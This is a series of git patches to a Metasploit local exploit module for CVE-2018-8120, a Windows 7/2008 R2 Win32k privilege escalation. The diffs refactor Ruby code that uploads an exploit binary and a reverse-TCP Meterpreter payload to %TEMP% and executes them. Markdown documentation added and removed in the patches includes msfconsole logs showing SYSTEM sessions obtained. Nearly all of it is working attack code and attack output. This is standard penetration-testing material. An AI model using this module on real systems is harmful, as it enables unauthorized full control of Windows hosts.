a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb index 2251250f54..c2522eb64a 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Local def initialize(info={}) super(update_info(info, { - 'Name' => 'Windows SetImeInfoEx Win32k NULL Pointer Dereference', + 'Name' => 'Windows ClientCopyImage Win32k Exploit', 'Description' => %q{ This module exploits elevation of privilege vulnerability exists in Windows 7 and 2008 R2 when the Win32k component fails to properly handle objects in memory. An attacker who @@ -91,30 +91,32 @@ def initialize(info={}) def create_payload_from_file(exec) vprint_status("Reading payload from file #{exec}") - ::IO.read(exec) + ::IO.read(exec) end def exploit @payload_name = datastore['PAYLOAD'] - rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" - vprint_status("EXE's name is: #{rexename}") - exe = generate_payload_exe - tempdir = session.sys.config.getenv('TEMP') - tempexename = Rex::Text.rand_text_alpha(rand(8)+6) - cmd = tempdir + "\\" + tempexename + ".exe" - vprint_status("Preparing payload at #{cmd}") - write_file(cmd, exe) - vprint_status("Payload uploaded to temp folder") - rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', 'CVE-2018-8120.exe') - raw = create_payload_from_file rexe - script_on_target = write_exe_to_target(raw, rexename) - command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename - vprint_status("Location of CVE-2018-8120.exe is: #{command}") - command += " " - command += "#{cmd}" - vprint_status("Executing command : #{command}") - command_output = cmd_exec(command) - print_status(command_output) + rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" + vprint_status("EXE's name is: #{rexename}") + exe = generate_payload_exe + tempdir = session.sys.config.getenv('TEMP') + tempexename = Rex::Text.rand_text_alpha(rand(8)+6) + + cmd = tempdir + "\\" + tempexename + ".exe" + vprint_status("Preparing payload at #{cmd}") + write_file(cmd, exe) + vprint_status("Payload uploaded to temp folder") + rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', 'CVE-2018-8120.exe') + raw = create_payload_from_file rexe + script_on_target = write_exe_to_target(raw, rexename) + command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename + vprint_status("Location of CVE-2018-8120.exe is: #{command}") + + command += " " + command += "#{cmd}" + vprint_status("Executing command : #{command}") + command_output = cmd_exec(command) + print_line(command_output) print_good('Exploit finished, wait for privileged payload execution to complete.') end end From 619a07fc3c13635fd6ccf861e5e1a0c3abce7597 Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Wed, 10 Oct 2018 14:21:08 +0530 Subject: [PATCH 21/39] Update --- modules/exploits/windows/local/ms18_8120_win32k_privsec.rb | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb index c2522eb64a..d9058f948e 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb @@ -70,8 +70,7 @@ def initialize(info={}) fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP') end end - - + def write_exe_to_target(rexe, rexename) begin vprint_warning("Writing file to %TEMP%") @@ -82,7 +81,7 @@ def initialize(info={}) vprint_good("File path: #{temprexe}") temprexe end - + def write_file_to_target(temprexe,rexe) fd = session.fs.file.new(temprexe, "wb") fd.write(rexe) @@ -93,7 +92,7 @@ def initialize(info={}) vprint_status("Reading payload from file #{exec}") ::IO.read(exec) end - + def exploit @payload_name = datastore['PAYLOAD'] rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" From dbcee569954269907b22b600bd9f44780234baf0 Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Wed, 10 Oct 2018 15:10:58 +0530 Subject: [PATCH 22/39] Fixing spaces at EOL --- modules/exploits/windows/local/ms18_8120_win32k_privsec.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb index d9058f948e..c14b3575e5 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb @@ -70,7 +70,7 @@ def initialize(info={}) fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP') end end - + def write_exe_to_target(rexe, rexename) begin vprint_warning("Writing file to %TEMP%") @@ -81,7 +81,7 @@ def initialize(info={}) vprint_good("File path: #{temprexe}") temprexe end - + def write_file_to_target(temprexe,rexe) fd = session.fs.file.new(temprexe, "wb") fd.write(rexe) @@ -92,7 +92,7 @@ def initialize(info={}) vprint_status("Reading payload from file #{exec}") ::IO.read(exec) end - + def exploit @payload_name = datastore['PAYLOAD'] rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" From c1c07d5c8f081f5c1ffc91e1e7e66f047bd8956e Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Wed, 10 Oct 2018 21:30:12 +0530 Subject: [PATCH 23/39] Updating Suggestion given by Shelby --- .../windows/local/ms18_8120_win32k_privsec.rb | 13 +++++-------- 1 file changed, 5 insertions(+), 8 deletions(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb index c14b3575e5..97940087e9 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb @@ -3,12 +3,9 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core/exploit/exe' - class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking - include Msf::Post::Common include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Exploit::EXE @@ -95,26 +92,26 @@ def initialize(info={}) def exploit @payload_name = datastore['PAYLOAD'] - rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" + rexename = "#{Rex::Text.rand_text_alphanumeric(10)}.exe" vprint_status("EXE's name is: #{rexename}") exe = generate_payload_exe tempdir = session.sys.config.getenv('TEMP') tempexename = Rex::Text.rand_text_alpha(rand(8)+6) - cmd = tempdir + "\\" + tempexename + ".exe" + cmd = "#{tempdir}\\#{tempexename}.exe" vprint_status("Preparing payload at #{cmd}") write_file(cmd, exe) vprint_status("Payload uploaded to temp folder") rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', 'CVE-2018-8120.exe') - raw = create_payload_from_file rexe + raw = create_payload_from_file(rexe) script_on_target = write_exe_to_target(raw, rexename) - command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename + command = "#{session.fs.file.expand_path("%TEMP%")}\\#{rexename}" vprint_status("Location of CVE-2018-8120.exe is: #{command}") command += " " command += "#{cmd}" vprint_status("Executing command : #{command}") - command_output = cmd_exec(command) + command_output = cmd_exec_get_pid(command) print_line(command_output) print_good('Exploit finished, wait for privileged payload execution to complete.') end From 4a821101ce9225460392d242b7804c23a80a5b9e Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Wed, 10 Oct 2018 21:59:46 +0530 Subject: [PATCH 24/39] Fixing cmd_exec_get_pid --- modules/exploits/windows/local/ms18_8120_win32k_privsec.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb index 97940087e9..6108d69ebc 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb @@ -111,8 +111,7 @@ def initialize(info={}) command += " " command += "#{cmd}" vprint_status("Executing command : #{command}") - command_output = cmd_exec_get_pid(command) - print_line(command_output) + pid = cmd_exec_get_pid(command) print_good('Exploit finished, wait for privileged payload execution to complete.') end end From 3de0d81a44411854a2a0a59ff749b54eb5308189 Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Wed, 10 Oct 2018 22:05:19 +0530 Subject: [PATCH 25/39] Deleting documenation from /post/windows/escalate --- .../escalate/ms18_8120_win32k_privsec.md | 66 ------------------- 1 file changed, 66 deletions(-) delete mode 100644 documentation/modules/post/windows/escalate/ms18_8120_win32k_privsec.md diff --git a/documentation/modules/post/windows/escalate/ms18_8120_win32k_privsec.md b/documentation/modules/post/windows/escalate/ms18_8120_win32k_privsec.md deleted file mode 100644 index 09afbd29a0..0000000000 --- a/documentation/modules/post/windows/escalate/ms18_8120_win32k_privsec.md +++ /dev/null @@ -1,66 +0,0 @@ -## Overview - -An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. - -To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system. - -The update addresses this vulnerability by correcting how Win32k handles objects in memory. - -* https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120 -* http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html -* https://github.com/bigric3/cve-2018-8120 -* https://github.com/unamer/CVE-2018-8120 - -## Verification steps - -1. Start `msfconsole` -2. Get a session -3. `use post/windows/escalate/ms18_8120_win32k_privsec` -4. `set SESSION [SESSION]` -5. `set POCCMD whoami` -6. `run` - -## Usage - -``` -msf exploit(windows/http/badblue_passthru) > run - -[*] Started reverse TCP handler on 192.168.1.102:4444 -[*] Trying target BadBlue EE 2.7 Universal... -[*] Sending stage (179779 bytes) to 192.168.1.105 -[*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.105:49214) at 2018-09-18 14:52:55 +0530 - -meterpreter > getuid -Server username: zero-PC\low -meterpreter > background -[*] Backgrounding session 1... -msf exploit(windows/http/badblue_passthru) > use post/windows/escalate/ms18_8120_win32k_privsec -msf post(windows/escalate/ms18_8120_win32k_privsec) > set SESSION 1 -SESSION => 1 -msf post(windows/escalate/ms18_8120_win32k_privsec) > set POCCMD whoami -POCCMD => whoami -msf post(windows/escalate/ms18_8120_win32k_privsec) > run - -[!] SESSION may not be compatible with this module. -[*] exe name is: f4MZlRO4LZ.exe -[*] Reading Payload from file /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.17.11/data/exploits/CVE-2018-0824/CVE-2018-8120.exe -[!] writing to %TEMP% -[+] Persistent Script written to C:\Users\LOW~1.ZER\AppData\Local\Temp\f4MZlRO4LZ.exe -[*] Starting module.. - -[*] Location of CVE-2018-8120.exe is: C:\Users\LOW~1.ZER\AppData\Local\Temp\f4MZlRO4LZ.exe -[*] Executing command : C:\Users\LOW~1.ZER\AppData\Local\Temp\f4MZlRO4LZ.exe whoami -CVE-2018-8120 exploit by @unamer(https://github.com/unamer) -[+] Detected kernel ntoskrnl.exe -[+] Get manager at fffff900c1a4e720,worker at fffff900c1a52060 -[+] Triggering vulnerability... -[+] Overwriting...fffff80002a35c38 -[+] Elevating privilege... -[+] Cleaning up... -[+] Trying to execute whoami as SYSTEM... -[+] Process created with pid 3516! -nt authority\system - -[*] Post module execution completed -msf post(windows/escalate/ms18_8120_win32k_privsec) > -``` From 48432491a29341188731b176e019b0f4c810de4f Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Wed, 10 Oct 2018 22:11:05 +0530 Subject: [PATCH 26/39] Adding documentation Documentation path: documentation/modules/exploit/windows/local/ms18_8120_win32k_privsec.md --- .../windows/local/ms18_8120_win32k_privsec.md | 52 +++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 documentation/modules/exploit/windows/local/ms18_8120_win32k_privsec.md diff --git a/documentation/modules/exploit/windows/local/ms18_8120_win32k_privsec.md b/documentation/modules/exploit/windows/local/ms18_8120_win32k_privsec.md new file mode 100644 index 0000000000..89f2180dde --- /dev/null +++ b/documentation/modules/exploit/windows/local/ms18_8120_win32k_privsec.md @@ -0,0 +1,52 @@ +## Overview + +An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. + +To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system. + +The update addresses this vulnerability by correcting how Win32k handles objects in memory. + +* https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120 +* http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html +* https://github.com/bigric3/cve-2018-8120 +* https://github.com/unamer/CVE-2018-8120 + +## Verification steps + +1. Start `msfconsole` +2. Get a session +3. `use exploit/windows/local/ms18_8120_win32k_privsec` +4. `set SESSION [SESSION]` +5. `set LHOST [LHOST]` +6. `exploit` + +## Usage + +``` +msf exploit(multi/handler) > run + +[*] Started reverse TCP handler on 192.168.1.102:4444 +[*] Sending stage (206403 bytes) to 192.168.1.103 +[*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.103:56748) at 2018-10-10 21:55:52 +0530 + +meterpreter > getuid +Server username: zero-PC\zero +meterpreter > background +[*] Backgrounding session 1... +msf exploit(multi/handler) > use exploit/windows/local/ms18_8120_win32k_privsec +msf exploit(windows/local/ms18_8120_win32k_privsec) > set SESSION 1 +SESSION => 1 +msf exploit(windows/local/ms18_8120_win32k_privsec) > set LHOST 192.168.1.102 +LHOST => 192.168.1.102 +msf exploit(windows/local/ms18_8120_win32k_privsec) > run + +[*] Started reverse TCP handler on 192.168.1.102:4444 +[+] Exploiting SetImeInfoEx Win32k NULL Pointer Dereference +[+] Exploit finished, wait for privileged payload execution to complete. +[*] Sending stage (206403 bytes) to 192.168.1.103 +[*] Meterpreter session 2 opened (192.168.1.102:4444 -> 192.168.1.103:56749) at 2018-10-10 21:56:35 +0530 + +meterpreter > getuid +Server username: NT AUTHORITY\SYSTEM +meterpreter > +``` From ee2c6274c71413c55a5f57750d6183aec75b3962 Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Wed, 10 Oct 2018 22:26:07 +0530 Subject: [PATCH 27/39] Updating description --- modules/exploits/windows/local/ms18_8120_win32k_privsec.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb index 6108d69ebc..e4b740b2c7 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb @@ -13,13 +13,15 @@ class MetasploitModule < Msf::Exploit::Local def initialize(info={}) super(update_info(info, { - 'Name' => 'Windows ClientCopyImage Win32k Exploit', + 'Name' => 'Windows SetImeInfoEx Win32k NULL Pointer Dereference', 'Description' => %q{ This module exploits elevation of privilege vulnerability exists in Windows 7 and 2008 R2 when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. + + This module is tested against windows 7 x64 and windows server 2008 R2 standard x64. }, 'License' => MSF_LICENSE, 'Author' => [ From 76325bd21e0d571764d389184e7906e514ad21c9 Mon Sep 17 00:00:00 2001 From: Shelby Pace Date: Wed, 10 Oct 2018 14:18:44 -0500 Subject: [PATCH 28/39] fixed indentation --- .../windows/local/ms18_8120_win32k_privsec.rb | 194 +++++++++--------- 1 file changed, 97 insertions(+), 97 deletions(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb index e4b740b2c7..19cbfd96cf 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb @@ -11,110 +11,110 @@ class MetasploitModule < Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Post::Windows::Process -def initialize(info={}) - super(update_info(info, { - 'Name' => 'Windows SetImeInfoEx Win32k NULL Pointer Dereference', - 'Description' => %q{ - This module exploits elevation of privilege vulnerability exists in Windows 7 and 2008 R2 - when the Win32k component fails to properly handle objects in memory. An attacker who - successfully exploited this vulnerability could run arbitrary code in kernel mode. An - attacker could then install programs; view, change, or delete data; or create new - accounts with full user rights. + def initialize(info={}) + super(update_info(info, + 'Name' => 'Windows SetImeInfoEx Win32k NULL Pointer Dereference', + 'Description' => %q{ + This module exploits elevation of privilege vulnerability exists in Windows 7 and 2008 R2 + when the Win32k component fails to properly handle objects in memory. An attacker who + successfully exploited this vulnerability could run arbitrary code in kernel mode. An + attacker could then install programs; view, change, or delete data; or create new + accounts with full user rights. - This module is tested against windows 7 x64 and windows server 2008 R2 standard x64. + This module is tested against windows 7 x64 and windows server 2008 R2 standard x64. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'unamer', # Exploit PoC + 'bigric3', # Analysis and exploit + 'Anton Cherepanov', # Vulnerability discovery + 'Dhiraj Mishra ' # Metasploit module + ], + 'Arch' => [ ARCH_X64 ], + 'Platform' => 'win', + 'SessionTypes' => [ 'meterpreter' ], + 'DefaultOptions' => { + 'EXITFUNC' => 'thread', + 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' }, - 'License' => MSF_LICENSE, - 'Author' => [ - 'unamer', # Exploit PoC - 'bigric3', # Analysis and exploit - 'Anton Cherepanov', # Vulnerability discovery - 'Dhiraj Mishra ' # Metasploit module - ], - 'Arch' => [ ARCH_X64 ], - 'Platform' => 'win', - 'SessionTypes' => [ 'meterpreter' ], - 'DefaultOptions' => { - 'EXITFUNC' => 'thread', - 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' - }, - 'Targets' => [ - [ 'Windows x64', { 'Arch' => ARCH_X64 } ] - ], - 'Payload' => { - 'Space' => 4096, - 'DisableNops' => true - }, - 'References' => [ - ['BID', '104034'], - ['CVE', '2018-8120'], - ['URL', 'https://github.com/unamer/CVE-2018-8120'], - ['URL', 'https://github.com/bigric3/cve-2018-8120'], - ['URL', 'http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html'], - ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120'] - ], - 'DisclosureDate' => 'May 9 2018', - 'DefaultTarget' => 0 - })) - - def validate_target - if is_system? - fail_with(Failure::None, 'Session is already elevated') - end - - if sysinfo['Architecture'] == ARCH_X86 - fail_with(Failure::NoTarget, 'Exploit code is 64-bit only') - end - - if sysinfo['OS'] =~ /XP/ - fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP') - end + 'Targets' => [ + [ 'Windows x64', { 'Arch' => ARCH_X64 } ] + ], + 'Payload' => { + 'Space' => 4096, + 'DisableNops' => true + }, + 'References' => [ + ['BID', '104034'], + ['CVE', '2018-8120'], + ['URL', 'https://github.com/unamer/CVE-2018-8120'], + ['URL', 'https://github.com/bigric3/cve-2018-8120'], + ['URL', 'http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html'], + ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120'] + ], + 'DisclosureDate' => 'May 9 2018', + 'DefaultTarget' => 0 + )) end - def write_exe_to_target(rexe, rexename) - begin - vprint_warning("Writing file to %TEMP%") - print_good("Exploiting SetImeInfoEx Win32k NULL Pointer Dereference") - temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename - write_file_to_target(temprexe,rexe) - end - vprint_good("File path: #{temprexe}") - temprexe +def validate_target + if is_system? + fail_with(Failure::None, 'Session is already elevated') end - def write_file_to_target(temprexe,rexe) - fd = session.fs.file.new(temprexe, "wb") - fd.write(rexe) - fd.close + if sysinfo['Architecture'] == ARCH_X86 + fail_with(Failure::NoTarget, 'Exploit code is 64-bit only') end - def create_payload_from_file(exec) - vprint_status("Reading payload from file #{exec}") - ::IO.read(exec) - end - - def exploit - @payload_name = datastore['PAYLOAD'] - rexename = "#{Rex::Text.rand_text_alphanumeric(10)}.exe" - vprint_status("EXE's name is: #{rexename}") - exe = generate_payload_exe - tempdir = session.sys.config.getenv('TEMP') - tempexename = Rex::Text.rand_text_alpha(rand(8)+6) - - cmd = "#{tempdir}\\#{tempexename}.exe" - vprint_status("Preparing payload at #{cmd}") - write_file(cmd, exe) - vprint_status("Payload uploaded to temp folder") - rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', 'CVE-2018-8120.exe') - raw = create_payload_from_file(rexe) - script_on_target = write_exe_to_target(raw, rexename) - command = "#{session.fs.file.expand_path("%TEMP%")}\\#{rexename}" - vprint_status("Location of CVE-2018-8120.exe is: #{command}") - - command += " " - command += "#{cmd}" - vprint_status("Executing command : #{command}") - pid = cmd_exec_get_pid(command) - print_good('Exploit finished, wait for privileged payload execution to complete.') + if sysinfo['OS'] =~ /XP/ + fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP') end - end end + +def write_exe_to_target(rexe, rexename) +begin +vprint_warning("Writing file to %TEMP%") + print_good("Exploiting SetImeInfoEx Win32k NULL Pointer Dereference") + temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename +write_file_to_target(temprexe,rexe) +end +vprint_good("File path: #{temprexe}") +temprexe +end + +def write_file_to_target(temprexe,rexe) + fd = session.fs.file.new(temprexe, "wb") + fd.write(rexe) + fd.close +end + +def create_payload_from_file(exec) + vprint_status("Reading payload from file #{exec}") + ::IO.read(exec) +end + +def exploit + @payload_name = datastore['PAYLOAD'] + rexename = "#{Rex::Text.rand_text_alphanumeric(10)}.exe" + vprint_status("EXE's name is: #{rexename}") + exe = generate_payload_exe + tempdir = session.sys.config.getenv('TEMP') + tempexename = Rex::Text.rand_text_alpha(rand(8)+6) + + cmd = "#{tempdir}\\#{tempexename}.exe" + vprint_status("Preparing payload at #{cmd}") + write_file(cmd, exe) + vprint_status("Payload uploaded to temp folder") + rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', 'CVE-2018-8120.exe') + raw = create_payload_from_file(rexe) + script_on_target = write_exe_to_target(raw, rexename) + command = "#{session.fs.file.expand_path("%TEMP%")}\\#{rexename}" + vprint_status("Location of CVE-2018-8120.exe is: #{command}") + + command += " " + command += "#{cmd}" + vprint_status("Executing command : #{command}") + pid = cmd_exec_get_pid(command) + print_good('Exploit finished, wait for privileged payload execution to complete.') +end + end From 04cc40136f1136366d89e430678815b54f36a946 Mon Sep 17 00:00:00 2001 From: Shelby Pace Date: Wed, 10 Oct 2018 14:41:14 -0500 Subject: [PATCH 29/39] changed formatting, deleted post, renamed files --- ...privsec.md => ms18_8120_win32k_privesc.md} | 0 ...privsec.rb => ms18_8120_win32k_privesc.rb} | 92 ++++++++++--------- .../escalate/ms18_8120_win32k_privsec.rb | 91 ------------------ 3 files changed, 47 insertions(+), 136 deletions(-) rename documentation/modules/exploit/windows/local/{ms18_8120_win32k_privsec.md => ms18_8120_win32k_privesc.md} (100%) rename modules/exploits/windows/local/{ms18_8120_win32k_privsec.rb => ms18_8120_win32k_privesc.rb} (58%) delete mode 100644 modules/post/windows/escalate/ms18_8120_win32k_privsec.rb diff --git a/documentation/modules/exploit/windows/local/ms18_8120_win32k_privsec.md b/documentation/modules/exploit/windows/local/ms18_8120_win32k_privesc.md similarity index 100% rename from documentation/modules/exploit/windows/local/ms18_8120_win32k_privsec.md rename to documentation/modules/exploit/windows/local/ms18_8120_win32k_privesc.md diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb similarity index 58% rename from modules/exploits/windows/local/ms18_8120_win32k_privsec.rb rename to modules/exploits/windows/local/ms18_8120_win32k_privesc.rb index 19cbfd96cf..f80b35391d 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb @@ -15,13 +15,13 @@ class MetasploitModule < Msf::Exploit::Local super(update_info(info, 'Name' => 'Windows SetImeInfoEx Win32k NULL Pointer Dereference', 'Description' => %q{ - This module exploits elevation of privilege vulnerability exists in Windows 7 and 2008 R2 + This module exploits elevation of privilege vulnerability that exists in Windows 7 and 2008 R2 when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. - This module is tested against windows 7 x64 and windows server 2008 R2 standard x64. + This module has been tested against windows 7 x64 and windows server 2008 R2 standard x64. }, 'License' => MSF_LICENSE, 'Author' => [ @@ -57,64 +57,66 @@ class MetasploitModule < Msf::Exploit::Local )) end -def validate_target - if is_system? - fail_with(Failure::None, 'Session is already elevated') + def validate_target + if is_system? + fail_with(Failure::None, 'Session is already elevated') + end + + if sysinfo['Architecture'] == ARCH_X86 + fail_with(Failure::NoTarget, 'Exploit code is 64-bit only') + end + + if sysinfo['OS'] =~ /XP/ + fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP') + end end - if sysinfo['Architecture'] == ARCH_X86 - fail_with(Failure::NoTarget, 'Exploit code is 64-bit only') + def write_exe_to_target(rexe, rexename) + begin + vprint_warning("Writing file to %TEMP%") + print_good("Exploiting SetImeInfoEx Win32k NULL Pointer Dereference") + temprexe = "#{session.fs.file.expand_path("%TEMP%")}\\#{rexename}" + write_file_to_target(temprexe,rexe) + rescue + fail_with(Failure::Unknown, "Writing #{temprexe} to disk was unsuccessful") + end + + vprint_good("File path: #{temprexe}") + temprexe end - if sysinfo['OS'] =~ /XP/ - fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP') + def write_file_to_target(temprexe, rexe) + fd = session.fs.file.new(temprexe, "wb") + fd.write(rexe) + fd.close end -end -def write_exe_to_target(rexe, rexename) -begin -vprint_warning("Writing file to %TEMP%") - print_good("Exploiting SetImeInfoEx Win32k NULL Pointer Dereference") - temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename -write_file_to_target(temprexe,rexe) -end -vprint_good("File path: #{temprexe}") -temprexe -end + def create_payload_from_file(exec) + vprint_status("Reading payload from file #{exec}") + File.read(exec) + end -def write_file_to_target(temprexe,rexe) - fd = session.fs.file.new(temprexe, "wb") - fd.write(rexe) - fd.close -end - -def create_payload_from_file(exec) - vprint_status("Reading payload from file #{exec}") - ::IO.read(exec) -end - -def exploit - @payload_name = datastore['PAYLOAD'] - rexename = "#{Rex::Text.rand_text_alphanumeric(10)}.exe" - vprint_status("EXE's name is: #{rexename}") - exe = generate_payload_exe - tempdir = session.sys.config.getenv('TEMP') - tempexename = Rex::Text.rand_text_alpha(rand(8)+6) + def exploit + @payload_name = datastore['PAYLOAD'] + rexename = "#{Rex::Text.rand_text_alphanumeric(10)}.exe" + vprint_status("EXE's name is: #{rexename}") + exe = generate_payload_exe + tempdir = session.sys.config.getenv('TEMP') + tempexename = Rex::Text.rand_text_alpha(rand(8)+6) cmd = "#{tempdir}\\#{tempexename}.exe" vprint_status("Preparing payload at #{cmd}") write_file(cmd, exe) vprint_status("Payload uploaded to temp folder") - rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', 'CVE-2018-8120.exe') + rexe = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', 'CVE-2018-8120.exe') raw = create_payload_from_file(rexe) script_on_target = write_exe_to_target(raw, rexename) command = "#{session.fs.file.expand_path("%TEMP%")}\\#{rexename}" vprint_status("Location of CVE-2018-8120.exe is: #{command}") - command += " " - command += "#{cmd}" - vprint_status("Executing command : #{command}") - pid = cmd_exec_get_pid(command) - print_good('Exploit finished, wait for privileged payload execution to complete.') + command << " #{cmd}" + vprint_status("Executing command : #{command}") + cmd_exec_get_pid(command) + print_good('Exploit finished, wait for privileged payload execution to complete.') + end end - end diff --git a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb deleted file mode 100644 index 82066052a9..0000000000 --- a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb +++ /dev/null @@ -1,91 +0,0 @@ -## -# This module requires Metasploit: https://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -class MetasploitModule < Msf::Post - Rank = GoodRanking - - include Msf::Post::File - include Msf::Post::Windows::Registry - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Windows SetImeInfoEx Win32k NULL Pointer Dereference', - 'Description' => %q{ - This module exploits elevation of privilege vulnerability exists in Windows 7 and 2008 R2 - when the Win32k component fails to properly handle objects in memory. An attacker who - successfully exploited this vulnerability could run arbitrary code in kernel mode. An - attacker could then install programs; view, change, or delete data; or create new - accounts with full user rights.}, - 'References' => - [ - ['BID', '104034'], - ['CVE', '2018-8120'], - ['URL', 'https://github.com/bigric3/cve-2018-8120'], - ['URL', 'https://github.com/unamer/CVE-2018-8120'], - ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120'], - ['URL', 'http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html'] - ], - 'Author' => - [ - 'unamer', # Exploit PoC - 'bigric3', # Analysis and exploit - 'Anton Cherepanov', # Vulnerability discovery - 'Dhiraj Mishra ' # Metasploit module - ], - 'DisclosureDate' => 'May 9 2018', - 'Arch' => [ARCH_X64, ARCH_X86], - 'SessionTypes' => ['meterpreter'], - 'License' => MSF_LICENSE - )) - - register_options( - [ - OptString.new('POCCMD', [true, 'The command to run from CVE-2018-8120.exe']), - ]) - end - - 